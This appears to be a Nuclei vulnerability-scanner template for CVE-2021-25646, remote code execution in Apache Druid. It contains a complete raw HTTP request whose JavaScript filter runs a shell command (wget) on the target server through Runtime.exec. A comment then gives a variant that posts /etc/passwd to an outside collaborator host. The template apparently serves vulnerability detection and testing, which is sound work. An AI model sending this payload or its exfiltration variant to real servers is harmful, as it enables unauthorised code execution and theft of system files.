id: CVE-2021-25646 info: name: Apache Druid RCE author: pikpikcu severity: critical reference: https://paper.seebug.org/1476/ description: | Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. tags: cve,cve2021,apache,rce requests: - raw: - | POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/json Content-Length: 1006 Connection: close {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript", "function": "function(value){return java.lang.Runtime.getRuntime().exec('wget example.com')}", "dimension": "added", "": { "enabled": "true" } } } },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}} # To read system Files, replace (wget example.com) with below payload # wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "application/json" part: header condition: and - type: regex regex: - "numRowsRead" - "numRowsIndexed" part: body condition: and